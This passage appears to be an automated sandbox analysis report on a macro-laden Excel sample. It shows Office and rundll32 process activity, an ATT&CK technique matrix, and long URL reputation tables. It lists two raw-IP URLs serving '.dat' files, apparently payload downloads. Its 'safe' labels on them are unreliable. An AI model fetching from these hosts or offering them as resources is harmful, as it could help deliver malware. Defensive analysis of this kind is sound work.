Source: Comission_1980420924_03172021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 0000000D.00000002.296066188.00000000033F0000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.309545784.0000000003380000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
http://185.82.219.75/44293.7328152778.dat0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
http://188.119.112.114/44293.7328152778.dat0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.82.219.75/44293.7328152778.datfalse
  • Avira URL Cloud: safe
unknown
http://188.119.112.114/44293.7328152778.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
    high
    https://login.microsoftonline.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
      high
      https://shell.suite.office.com:14432F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
          high
          https://autodiscover-s.outlook.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
              high
              https://cdn.entity.2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                    high
                    https://powerlift.acompli.net2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v12F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                      high
                      https://cortana.ai2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                high
                                https://api.aadrm.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                      high
                                      https://cr.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                            high
                                            https://graph.ppe.windows.net2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                            high
                                                            https://graph.windows.net2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                high
                                                                                                https://api.office.net2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                    • 0%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v22F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                          • URL Reputation: safe
